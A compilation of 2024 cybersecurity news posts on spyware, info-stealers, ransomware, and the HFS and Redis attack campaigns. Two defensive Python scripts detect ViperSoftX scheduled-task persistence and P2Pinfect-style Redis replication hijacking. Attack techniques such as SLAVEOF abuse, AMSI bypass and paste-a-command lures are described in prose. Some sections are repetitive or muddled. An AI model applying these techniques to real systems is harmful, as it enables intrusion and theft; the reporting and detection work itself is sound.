Pro-Houthi Group Deploys Android Spyware to Target Yemeni Humanitarian Orgs


Insikt Group's research reveals that OilAlpha, a suspected pro-Houthi entity, continues to target humanitarian and human rights organisations in Yemen. They deploy malicious Android applications to steal credentials and gather intelligence, with the ability to control aid distribution. 

Notable organisations affected include CARE International and the Norwegian Refugee Council. This report focuses on the continuing threat and recommends mitigations such as social engineering awareness training, strong passwords, and multi-factor authentication. 

In May 2023, Insikt Group published its first report on OilAlpha, a pro-Houthi group that targets humanitarian organisations in Yemen with malicious Android applications. A year later, new discoveries show that OilAlpha is still active and poses a serious threat to humanitarian activities in the region. 

A recently published report identified a new set of malicious mobile apps and infrastructure associated with OilAlpha. Employees of internationally renowned humanitarian organisations, such as Saudi Arabia's King Salman Humanitarian Aid and Relief Centre, the Norwegian Refugee Council, and CARE International, are the targets of these applications. 

Last month researchers discovered a malicious Android file named “Cash Incentives.apk,” linked to OilAlpha's infrastructure. The app requests invasive permissions, including access to the camera, audio, SMS, contacts, and more, classifying it as a remote access trojan (RAT). Subsequent investigation identified two more malicious applications targeting the Norwegian Refugee Council and CARE International, all attempting to steal credentials and gather sensitive information. 

OilAlpha's operations include a credential theft portal under the domain kssnew[.]online. This webpage impersonates the login pages of humanitarian organisations, prompting users to enter their credentials, which are then captured by the perpetrators. 

To address this issue, organisations should create information security policies and perform social engineering and anti-phishing awareness training. Strong passwords and multi-factor authentication (MFA) can dramatically reduce the likelihood of credential theft. Furthermore, users should exercise caution when using direct messaging on social media and encrypted messages, and check the legitimacy of messages whenever possible. 

OilAlpha's operations point to a persistent effort to influence humanitarian relief distribution in Yemen. The group's focus on humanitarian organisations is expected to continue, possibly spreading outside Yemen.

Improved ViperSoftX Malware Distributed Through eBooks


Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%\Microsoft\Windows directory, renaming them to .au3 and AutoIt3.exe.
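One way to hunt for the scheduled-task persistence described above, as an added example (not Trellix's tooling): the script parses exported task definitions (the XML produced by `schtasks /query /tn <name> /xml` or PowerShell's `Export-ScheduledTask`) and flags tasks that launch AutoIt3.exe or a .au3 script from a user-writable profile path on a short logon-triggered repetition. The two task definitions embedded below are constructed for illustration, not captured from an infection.

```python
"""Flag Scheduled Task XML that matches the ViperSoftX persistence pattern:
AutoIt3.exe / a .au3 script run from a user profile directory every few
minutes after logon. Input is the XML that Task Scheduler exports."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from typing import Optional

# Namespace used by every exported Task Scheduler definition.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments a legitimate AutoIt installation would not normally use
# (%APPDATA% expands to ...\AppData\Roaming on a default profile).
USER_WRITABLE_MARKERS = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\")
MAX_INTERVAL_MINUTES = 10  # anything this frequent at logon is worth a look


def iso_duration_minutes(interval: str) -> Optional[float]:
    """Convert a Task Scheduler ISO-8601 duration (PT5M, PT1H30M, P1D) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", interval or "")
    if not m:
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def audit_task_xml(xml_text: str) -> list[str]:
    """Return human-readable reasons the task looks like ViperSoftX persistence.

    An empty list means no AutoIt action was found; the trigger frequency alone
    is only reported as supporting evidence once an AutoIt action is present."""
    root = ET.fromstring(xml_text)
    reasons: list[str] = []

    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = (exec_node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        arguments = (exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        combined = f"{command} {arguments}".lower()
        runs_autoit = "autoit3.exe" in combined or ".au3" in combined
        from_user_dir = any(marker in combined for marker in USER_WRITABLE_MARKERS)
        if runs_autoit and from_user_dir:
            reasons.append(f"AutoIt interpreter/script launched from a user-writable path: {command} {arguments}".strip())
        elif runs_autoit:
            reasons.append(f"AutoIt interpreter/script in task action: {command}")

    if not reasons:
        return []

    for trigger in root.findall(".//t:Triggers/t:LogonTrigger", TASK_NS):
        interval = trigger.findtext("t:Repetition/t:Interval", default="", namespaces=TASK_NS)
        minutes = iso_duration_minutes(interval)
        if minutes is not None and minutes <= MAX_INTERVAL_MINUTES:
            reasons.append(f"logon trigger repeats every {interval} ({minutes:g} min)")
    return reasons


# Constructed sample: the pattern described in the article (AutoIt3.exe and a
# .au3 script under %APPDATA%\Microsoft\Windows, run every 5 minutes at logon).
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\alice\AppData\Roaming\Microsoft\Windows\AutoIt3.exe</Command>
      <Arguments>C:\Users\alice\AppData\Roaming\Microsoft\Windows\update.au3</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign sample: a daily backup job from Program Files.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T09:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Backup\backup.exe</Command><Arguments>/daily</Arguments></Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, "->", audit_task_xml(xml_text) or "nothing flagged")
```

Run it over every task exported from a host (for example by looping `schtasks /query /xml` output into files) rather than a single definition; the file names under %APPDATA% vary per infection, so the path and interval heuristics matter more than exact names.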

A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.

Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


Decrypting DoNex: The Flaw That Brought Down a Ransomware Empire

DoNex Ransomware Encryption: Flaw in Cryptographic Schema

Experts uncovered a critical flaw in the encryption schema of the DoNex ransomware, covering all its variants and predecessors. Since March 2024, they have worked with law enforcement to quietly provide a decryptor to affected DoNex victims.

The cryptographic weakness was discussed openly at Recon 2024, prompting the researchers to disclose the problem and its ramifications publicly.

The Vulnerability

Avast researchers discovered that the DoNex ransomware went through many rebrandings after its original identification as Muse in April 2022. Subsequent revisions of DoNex included a rebrand to a reported Fake LockBit 3.0 in November 2022, followed by DarkRace in May 2023, and lastly DoNex in March 2024. 

Since April 2024, the team has observed no further samples, and the ransomware group's public Tor address has remained dormant, implying that DoNex's evolution and rebranding efforts may have ended.

How It Works

The DoNex malware uses a multi-step encryption scheme. During execution, the CryptGenRandom function generates an encryption key, from which a ChaCha20 symmetric key is derived and later used to encrypt files.

After encryption, the symmetric key is encrypted with RSA-4096 and appended to the affected file. Files up to 1 MB are encrypted in their entirety, while larger files are encrypted in block segments. An XOR-encrypted configuration file stores the ransomware's settings, including whitelisted extensions and files, and the services to terminate.

While the researchers have not described the specific process they used to derive the decryption, more information about the same cryptographic flaw is available in materials from the Recon 2024 lecture titled "Cryptography is hard: Breaking the DoNex ransomware," presented by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence specialist with the Dutch National Police.

Implications

DoNex particularly targeted victims in the United States, Italy, and Belgium with tailored attacks. The researchers confirmed that the leaked DoNex decryptor can decrypt all forms of the DoNex ransomware, including earlier versions.

Victims of the DoNex ransomware can identify an attack based on the ransom note left by the software. Although several varieties of DoNex (Fake LockBit, DarkRace, and DoNex) create different ransom notes, they all have the same layout.

  • Victim Relief: Victims no longer need to rely on paying the ransom to regain access to their files. The decryptor provides a straightforward solution.
  • Public Disclosure: The flaw was publicly discussed at the Recon 2024 conference, leading to the official release of details and the decryptor. Transparency is crucial in the fight against ransomware.
  • Ongoing Vigilance: While this breakthrough is significant, it’s essential to remain vigilant. Cybercriminals adapt quickly, and new variants may emerge. Regular backups and robust security practices remain crucial.

Hackers Attack HFS Servers to Install Malware and Mine Monero


Cybersecurity researchers have identified a wave of attacks targeting outdated versions of the HTTP File Server (HFS) software from Rejetto, aiming to distribute malware and cryptocurrency mining tools. These attacks exploit a critical security flaw known as CVE-2024-23692, which allows hackers to execute arbitrary commands without needing authentication.

CVE-2024-23692 is a high-severity vulnerability discovered by security researcher Arseniy Sharoglazov. It was publicly disclosed in May this year, following a detailed technical report. The flaw is a template injection vulnerability that enables remote attackers to send specially crafted HTTP requests to execute commands on the affected systems. The vulnerability affects HFS versions up to and including 2.3m. In response, Rejetto has issued a warning to users, advising against the use of these versions due to their susceptibility to control by attackers.

Researchers at AhnLab Security Intelligence Center (ASEC) have observed multiple attacks on version 2.3m of HFS. This version remains popular among individuals, small teams, educational institutions, and developers for network file sharing. The attacks likely began after the release of Metasploit modules and proof-of-concept exploits soon after the vulnerability's disclosure.

During these attacks, hackers gather information about the compromised system, install backdoors, and deploy various types of malware. Commands such as "whoami" and "arp" are executed to collect system and user information and identify connected devices. Hackers also add new users to the administrators' group and terminate the HFS process to prevent other threat actors from exploiting the same vulnerability.

In several cases, the XMRig tool, used for mining Monero cryptocurrency, was installed. ASEC researchers attribute one of these attacks to the LemonDuck threat group. Other malware payloads deployed include:

1. XenoRAT: A tool for remote access and control, often used alongside XMRig.

2. Gh0stRAT: Used for remote control and data exfiltration.

3. PlugX: A backdoor associated with Chinese-speaking threat actors, providing persistent access.

4. GoThief: An information stealer that uses Amazon AWS for data exfiltration, capturing screenshots, collecting desktop file information, and sending data to an external command and control server.

AhnLab continues to detect attacks on HFS version 2.3m. Given that the server must be online for file sharing, it remains a lucrative target for hackers. Rejetto recommends users switch to version 0.52.x, which is the latest release despite its lower version number. This version is web-based, requires minimal configuration, and supports HTTPS, dynamic DNS, and administrative panel authentication.

The company has also provided indicators of compromise, including malware hashes, IP addresses of command and control servers, and download URLs for the malware used in these attacks. Users are urged to update their software to the latest version and follow cybersecurity best practices to protect their systems from such vulnerabilities.

By understanding and addressing these vulnerabilities, users can better secure their systems against these sophisticated attacks.


Inside the Ticketmaster Hack: 440,000 Taylor Swift Fans at Risk

In May, the hacking group ShinyHunters claimed to have obtained personal information from more than 500 million Ticketmaster users and was selling the data on the dark web; the company has now acknowledged that customer data may have been "exposed." 

The breach, initially believed to be limited in scope, has now escalated, affecting millions of ticket holders, including fans attending Taylor Swift’s Eras Tour. Let’s delve into the details of this high-stakes cybercrime.

Ticketmaster Data Breach: What You Need to Know

In an email sent to affected customers, Ticketmaster said that they had discovered "unauthorised activity" in a third-party cloud database, and that personal data of "some customers" who purchased tickets to events in North America (the United States, Canada, and/or Mexico) could have been compromised.

Ticketmaster confirmed that unauthorized access occurred, leading to the compromise of sensitive customer data. The hackers gained access to 193 million ticket barcodes, valued at an astonishing $22.6 billion. Among these, 440,000 tickets belong to Taylor Swift’s ongoing tour, leaving fans anxious and concerned.

The Ransom Demand

ShinyHunters, known for their audacity, demanded an $8 million ransom for the safe return of the stolen data. The group threatened to leak the ticket barcodes if their demands were not met promptly. Ticketmaster faced a dilemma: pay the ransom or risk exposing millions of customers’ personal information.

The American ticket sales and distribution company stated, "Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied. This is just one of many fraud protections we implement to keep tickets safe and secure."

"Some outlets are inaccurately reporting about a ransom offer. We were never engaged for a ransom and did not offer them money," Ticketmaster confirmed. 

Potential Implications

1. Privacy Concerns

Customers trust platforms like Ticketmaster with their personal details, including names, addresses, and payment information. The breach jeopardizes this trust and raises questions about data security practices within the industry.

2. Financial Impact

Ticketmaster faces a double bind: pay the ransom and potentially encourage further attacks, or refuse and risk public outrage. The financial implications extend beyond the ransom amount. Legal fees, compensation to affected customers, and damage control efforts will strain the company’s resources.

3. Reputation Damage

Ticketmaster’s reputation hangs in the balance. Swift action is crucial to mitigate reputational harm. Customers may think twice before purchasing tickets through the platform, affecting future sales and partnerships.

Some Key Takeaways

  • Third-Party Risk: Organizations must carefully assess the security practices of third-party vendors who handle sensitive data.
  • Encryption Matters: While Ticketmaster’s payment card information was encrypted, it’s crucial to ensure strong encryption methods are in place.
  • Prompt Communication: Ticketmaster’s quick response in notifying affected customers demonstrates the value of timely communication during a breach.

RansomHub and RansomHouse: Unmasking the Culprits Behind Italy’s Attacks

Hackers have claimed responsibility for three major cyberattacks in Italy in the last 24 hours. The RansomHub and RansomHouse gangs allegedly carried out the ransomware assaults in Italy. RansomHub targeted the websites of Cloud Europe and Mangimi Fusco, while RansomHouse claimed responsibility for conducting a cyberattack against Francesco Parisi.

Italy's Ransomware Attacks

Cloud Europe is a Tier IV carrier-neutral data center based in Rome's Tecnopolo Tiburtino. According to the company's website, it specializes in data center architecture and management, focusing on security and service continuity. The company creates, hosts, and operates modular infrastructure for data centers in both the private and public sectors.

The Attacks

1. Cloud Europe: On June 29, 2024, RansomHub claimed responsibility for infiltrating the servers of Cloud Europe, a prominent Tier IV certified data center in Rome. The attackers allegedly encrypted the servers and exfiltrated 70 terabytes of data. Among the stolen information were 541.41 gigabytes of sensitive data, including client records, financial documents, and proprietary software.

2. Mangimi Fusco: The same day, RansomHub targeted Mangimi Fusco, an animal feed manufacturer. The group claimed to have stolen 490 gigabytes of confidential data, including client files, budget details, and payroll information. However, as of now, Mangimi Fusco’s website shows no signs of the reported attack, leaving room for skepticism.

3. Francesco Parisi: RansomHouse, another hacking collective, breached the website of Francesco Parisi, a group specializing in freight forwarding and shipping services. The attack occurred on May 29, 2024, and resulted in the theft of 150 gigabytes of company data. Francesco Parisi has acknowledged the breach and is working to restore normalcy while enhancing its cybersecurity defenses.

The Implications

These attacks raise critical questions about the state of cybersecurity readiness among Italian businesses:

Vulnerabilities: Despite advancements in security protocols, organizations remain vulnerable to sophisticated attacks. The ability of threat actors to infiltrate well-established data centers and corporate websites highlights the need for continuous vigilance.

Data Privacy: The stolen data contains sensitive information that could be exploited for financial gain or used maliciously. Companies must prioritize data privacy and invest in robust encryption, access controls, and incident response plans.

Business Continuity: When ransomware strikes, business operations grind to a halt. Cloud Europe’s experience serves as a stark reminder that even data centers, designed to ensure continuity, are not immune. Organizations must have contingency plans to minimize disruptions.

How to Stay Safe?

To safeguard against ransomware and other cyber threats, companies should consider the following strategies:

  • Regular Backups: Frequent backups of critical data are essential. These backups should be stored securely and tested periodically to ensure their integrity.
  • Employee Training: Human error often opens the door to cyberattacks. Regular training sessions can educate employees about phishing emails, suspicious links, and safe online practices.
  • Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of security, making it harder for unauthorized individuals to gain access.
  • Incident Response Plans: Organizations should develop comprehensive incident response plans that outline steps to take during a breach. Swift action can minimize damage and prevent data loss.

Kimsuky Unleashes TRANSLATEXT Malware on South Korean Academic Institutions


An investigation has found that a North Korea-linked threat actor known as Kimsuky has used a malicious Google Chrome extension to steal sensitive information as part of an ongoing intelligence collection effort. Zscaler ThreatLabz, which observed the activity in early March 2024, has codenamed the extension TRANSLATEXT, highlighting its ability to gather email addresses, usernames, passwords, cookies, and screenshots. 

The campaign is said to have targeted South Korean academia, specifically researchers focused on North Korean politics. Kimsuky, a North Korean hacker group active since 2012, is notorious for cyber espionage and financially motivated attacks against South Korean organisations. The PowerShell script fetched from the remote server uploads general information about the victim and creates a Windows shortcut that retrieves a further script from the same server. TRANSLATEXT's exact delivery method remains unclear, which makes it harder for defenders to protect against it. 

That said, Kimsuky is well known for using sophisticated spear-phishing and social engineering to trick targets into starting the infection chain. The attack begins with a ZIP archive, themed around Korean military history, that contains two files: a Hangul Word Processor document and an executable. Once the executable is launched, it retrieves a PowerShell script from the attacker's server. In addition to exporting the victim's information to a GitHub repository, this script downloads additional PowerShell code via a Windows shortcut (LNK) file and executes it. 

This multi-stage attack process shows that the operation is sophisticated and well planned. By using a familiar and seemingly legitimate document, the attackers reduce the chance that targets become suspicious. Using GitHub for the initial data export blends malicious activity into regular internet traffic, making it much harder for traditional security systems to find and block. A number of other groups are also associated with the Lazarus cluster or are part of the Reconnaissance General Bureau (RGB). 

For instance, APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima are groups affiliated with the Lazarus cluster. In recent weeks the group has weaponized a vulnerability in Microsoft Office (CVE-2017-11882), distributed a keylogger, and used job-themed lures in attacks on the aerospace and defence industries to drop an espionage tool that gathers data and executes secondary payloads. "The backdoor is unknown to the public and the attacker can conduct basic reconnaissance, drop additional payloads, and then take over or remotely control the computer," CyberArmor said. 

CyberArmor has named this campaign Niki. Kimsuky is not a new player: active since at least 2012, the group has built a reputation for cyber espionage and financially motivated attacks, primarily on South Korean institutions. It has been reported to have stolen classified information, committed financial fraud, and carried out ransomware attacks. Its adaptability and persistence have made it one of the most formidable cyber threat actors associated with North Korea. 

Kimsuky's ability to blend cyber espionage with financially motivated operations indicates a versatile approach to the North Korean regime's objectives, whether gathering intelligence or generating revenue to support it. The exact initial access mechanism for the newly discovered activity is not yet clear, although the group is known for using spear-phishing and social engineering to launch the infection chain. 

The attack is believed to have begun with the delivery of a ZIP archive, purportedly about Korean military history, containing two files: a Hangul Word Processor document and an executable. As soon as the executable is launched, it retrieves a PowerShell script from an attacker-controlled server; this script downloads additional PowerShell code via a Windows shortcut (LNK) file and creates a GitHub repository to which the compromised victim's information is periodically uploaded. 

After the GitHub repository has been created, the attacker deletes the LNK file in question. Zscaler also found a GitHub account, created on February 13, 2024, that briefly hosted the TRANSLATEXT extension under the name "GoogleTranslate.crx," regardless of how the extension is currently distributed. TRANSLATEXT, which masquerades as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver; siphon email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data. It is also designed to fetch commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser, among other actions.

Ransomware Strikes Auto Dealerships: The CDK Global Incident

The Attack

The automotive industry has faced an unprecedented challenge: a cyberattack targeting CDK Global, a major software provider for auto dealerships. This incident has sent shockwaves through the industry, affecting dealerships across the United States. In this blog post, we’ll delve into the details of the attack, its consequences, and the lessons we can learn from it.

What Happened?

CDK Global, a company that provides software solutions to auto dealers, fell victim to a ransomware attack. The attack was orchestrated by a group known as BlackSuit, which demanded a hefty ransom from CDK. As a precautionary measure, CDK temporarily shut down most of its systems to prevent further damage and protect its customers.

Impact on U.S. Car Dealers

Several major auto dealership groups reported disruptions:

Lithia Motors: Lithia Motors, one of the largest dealership networks in the U.S., faced operational challenges due to the CDK cyberattack. Their day-to-day processes, including inventory management and customer interactions, were affected.

Group 1 Automotive: Group 1 Automotive, another prominent player in the industry, experienced delays in vehicle sales and service. The attack disrupted their ability to process transactions efficiently.

Penske Automotive Group: Penske, a well-known name in auto retail, struggled with system outages. Their sales teams couldn’t access critical information, impacting customer service.

Sonic Automotive: Sonic Automotive’s dealerships grappled with inventory discrepancies. The attack disrupted their supply chain management, leading to delays in vehicle deliveries.

Asbury Automotive Group: Asbury Automotive Group faced challenges in communicating with customers. Their CRM systems were offline, affecting follow-ups and lead management.

AutoNation: AutoNation, a nationwide dealership network, had to adapt quickly. The attack disrupted their online sales platforms, affecting customer inquiries and transactions.

How to Stay Safe?

1. Cybersecurity Preparedness

The CDK incident underscores the importance of robust cybersecurity measures. Dealerships must invest in secure infrastructure, regular vulnerability assessments, and employee training. Cyber hygiene is crucial to prevent and mitigate attacks.

2. Incident Response Plans

Having a well-defined incident response plan is essential. Dealerships should know how to react swiftly when faced with a cyber threat. Regular drills and simulations can help teams prepare for such scenarios.

3. Vendor Risk Management

Dealerships rely on third-party vendors like CDK for critical services. Assessing vendor security practices and ensuring contractual obligations related to cybersecurity are met is vital. Regular audits can help identify vulnerabilities.

P2Pinfect Worm Now Delivering Ransomware on Redis Servers


Cado Security experts warned that the P2Pinfect worm is used in attacks on Redis servers to deliver ransomware and cryptocurrency mining payloads. 

Palo Alto Networks Unit 42 researchers uncovered the P2P worm P2PInfect in July 2023, which targets Redis servers running Linux and Windows operating systems. P2PInfect's ability to target Redis servers on both operating systems makes it more scalable and dangerous than other worms.

Cado Security Labs identified a new strain of the P2Pinfect botnet in December 2023, specifically targeting routers, IoT devices, and other embedded devices. This variation was built for the Microprocessor without Interlocked Pipelined Stages (MIPS) architecture. The new bot includes enhanced evasion methods, the ability to evade execution in a Virtual Machine (VM) or a debugger, and anti-forensics support for Linux hosts. 

The worm is written in Rust and targets Redis instances using the Lua sandbox escape vulnerability CVE-2022-0543 (CVSS score 10.0). In September 2023, Cado Security Labs detected a 600x spike in P2Pinfect traffic since August 28. Researchers noted that the malware did not seem to have a goal other than to spread; however, a new upgrade of P2Pinfect has introduced a ransomware and crypto miner payload. 

The most recent campaign began on June 23, based on the TLS certificate used for C2 communications. The malware propagates by leveraging Redis's replication features, where nodes in a distributed cluster follow a leader/follower topology. The attackers exploited this feature by making follower nodes load arbitrary modules, allowing code execution on these nodes. P2Pinfect uses the SLAVEOF command to turn open Redis nodes into followers of a server under the control of its operator. 

“P2Pinfect is a worm, so all infected machines will scan the internet for more servers to infect with the same vector described above. P2Pinfect also features a basic SSH password sprayer, where it will try a few common passwords with a few common users, but the success of this infection vector seems to be a lot less than with Redis, likely as it is oversaturated,” Cado researchers stated. “Upon launch it drops an SSH key into the authorised key file for the current user and runs a series of commands to prevent access to the Redis instance apart from IPs belonging to existing connections.”
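The replication abuse described above leaves traces an operator can check: a node hijacked with SLAVEOF reports `role:slave` with the attacker's host as `master_host`, and a module it was made to load appears in the modules section. The script below is an added example (not Cado's or Redis's code) that parses the text of `redis-cli INFO replication` and `redis-cli INFO modules` and compares it with the masters and modules the operator expects; the INFO samples embedded in it are constructed for illustration.

```python
"""Audit Redis INFO output for signs of P2Pinfect-style replication hijacking:
an unexpected master (SLAVEOF/REPLICAOF abuse) or an unexpected loaded module.
Input is the plain text returned by `redis-cli INFO replication` and
`redis-cli INFO modules` (or `INFO everything`)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "medium"
    message: str


def parse_info(info_text: str) -> dict[str, list[str]]:
    """Parse INFO's `key:value` lines into a dict. Repeated keys (for example
    several `module:` lines) are kept in order; `# Section` headers are skipped."""
    parsed: dict[str, list[str]] = {}
    for raw in info_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition(":")
        if sep:
            parsed.setdefault(key, []).append(value)
    return parsed


def audit_redis_info(
    info_text: str,
    expected_masters: set[str],
    expected_modules: frozenset[str] = frozenset(),
) -> list[Finding]:
    """Compare a node's INFO output with the operator's expectations.

    expected_masters: "host:port" strings this node may legitimately replicate
    from (empty for a standalone node or a node that should itself be master).
    expected_modules: names of modules the operator deliberately loaded."""
    info = parse_info(info_text)
    findings: list[Finding] = []

    role = info.get("role", ["unknown"])[0]
    if role == "slave":
        host = info.get("master_host", ["?"])[0]
        port = info.get("master_port", ["?"])[0]
        master = f"{host}:{port}"
        if master not in expected_masters:
            findings.append(Finding("high", f"node is replicating from unexpected master {master} (SLAVEOF/REPLICAOF abuse?)"))
        elif info.get("master_link_status", [""])[0] != "up":
            findings.append(Finding("medium", f"replication link to {master} is not up"))

    # INFO modules lines look like: module:name=foo,ver=1,api=1,filters=0,usedby=[],using=[],options=[]
    for entry in info.get("module", []):
        match = re.search(r"name=([^,]+)", entry)
        name = match.group(1) if match else entry
        if name not in expected_modules:
            findings.append(Finding("high", f"unexpected loaded module '{name}' (check for attacker-loaded .so)"))
    return findings


# Constructed sample: a node pointed at an outside master and carrying a
# module the operator never loaded. 203.0.113.10 is a documentation address.
COMPROMISED_INFO = """\
# Replication
role:slave
master_host:203.0.113.10
master_port:6379
master_link_status:up
slave_read_only:1
# Modules
module:name=exp,ver=1,api=1,filters=0,usedby=[],using=[],options=[]
"""

# Constructed sample: a healthy master with one known replica and no modules.
HEALTHY_INFO = """\
# Replication
role:master
connected_slaves:1
slave0:ip=10.0.0.6,port=6379,state=online,offset=1234,lag=0
# Modules
"""


if __name__ == "__main__":
    for label, text in (("compromised", COMPROMISED_INFO), ("healthy", HEALTHY_INFO)):
        result = audit_redis_info(text, expected_masters={"10.0.0.5:6379"})
        print(label, "->", [f"{f.severity}: {f.message}" for f in result] or "clean")
```

The check complements, rather than replaces, configuration hardening: keep `protected-mode yes`, set `requirepass`, `bind` Redis to a private interface, and on versions that support `rename-command`, rename or disable SLAVEOF, REPLICAOF and MODULE so an exposed node cannot be re-pointed in the first place.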

The worm's primary binary appears to have been changed; it is now built with the Tokio async framework for Rust and is packed with UPX. The malware's internals have been completely rewritten; researchers discovered that the binary had been stripped and partially obfuscated to make static analysis more challenging. Previously, P2Pinfect maintained persistence by adding itself to .bash_logout and running a cron job; however, these methods are no longer used. Other behaviours, such as the initial setup, are unaffected.

From Code to Chaos: BlackSuit Ransomware and The CDK Global Cyber Crisis

In recent days, the automotive industry has been hit by a significant IT outage that has disrupted operations for car dealerships across North America. The culprit? The notorious BlackSuit ransomware gang. In this blog post, we’ll delve into the details of the attack, its impact, and what it means for CDK Global and its customers.

The Incident

According to people familiar with the situation, the BlackSuit ransomware gang is responsible for CDK Global's significant IT failure and interruption to car dealerships throughout North America.

The conversations follow the BlackSuit ransomware attack, which led CDK to lock down its IT infrastructure and data centers, including its car dealership platform, to prevent the attack from spreading. The company attempted to restore services on Wednesday, but a second cybersecurity attack forced it to shut down all IT systems again.

The Attack

CDK Global, a leading provider of technology solutions for auto dealerships, found itself in the crosshairs of cybercriminals.

While the company has yet to officially confirm the ransomware attack, multiple sources indicate that BlackSuit is behind the incident. The attack likely exploited vulnerabilities in CDK’s systems, leading to widespread disruption.

Impact on Dealerships

Two of the largest public car dealership companies, Penske Automotive Group and Sonic Automotive, disclosed that they, too, were impacted by the outages.

The fallout from the CDK Global outage has been substantial. Car dealerships rely heavily on CDK’s software for inventory management, sales, and customer service. 

With the systems down, dealers have had to resort to manual processes, including pen-and-paper record-keeping. Imagine the chaos in a busy dealership trying to manage sales, service appointments, and parts inventory without their usual digital tools.

Data Theft Concerns

Beyond the immediate operational challenges, there are serious concerns about data theft. Ransomware attacks often involve stealing sensitive information before encrypting files and demanding a ransom.

CDK Global must now investigate whether customer data, financial records, or other critical information has been compromised. The potential fallout from such a breach could be long-lasting and damaging.

Response and Recovery

In November 2023, the FBI and CISA noted in a joint advisory that Royal's and BlackSuit's encryptors use similar strategies and have coding overlaps.

CDK Global’s response to the attack is crucial. They need to assess the extent of the breach, restore systems, and enhance security measures. Communication with affected dealerships is equally important. Dealers need transparency about the situation, timelines for resolution, and guidance on how to navigate the outage.

Crafty Criminals Use Fake Error Messages to Deploy Malware via PowerShell


Criminals are targeting thousands of organizations worldwide with social engineering attacks that use fake error messages to trick users into running malicious PowerShell scripts.

This new Windows malware campaign uses bogus error messages from Google Chrome, Microsoft Word, and OneDrive that appear legitimate. When victims visit a compromised website, they encounter a pop-up error message in their browser. This tactic, although old, remains highly effective. It's crucial to be aware of this trick to prevent others from falling for it.

Victims are instructed to click a "fix" button and paste the displayed code into a PowerShell terminal or Windows Run dialog box. This action allows PowerShell to execute another remote script that downloads and installs malware on the victim's computer.

Proofpoint malware researchers have identified at least two criminal groups using this method. One of these groups is likely using it to spread ransomware.

"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," stated Tommy Madjar, Dusty Miller, and Selena Larson in a recent report.

Proofpoint discovered a group named TA571 employing this PowerShell technique as early as March 1, and another gang behind the ClearFake malware campaign has been using it since early April. Both groups were still active in early June, and a third campaign, dubbed ClearFix, has been testing it out since at least May.

In these attacks, users visit a compromised website that loads a malicious script hosted on the blockchain via Binance's Smart Chain contracts, known as EtherHiding. This script then triggers a fake warning box in the browser, prompting the victim to install a "root certificate" to fix a fictitious problem.

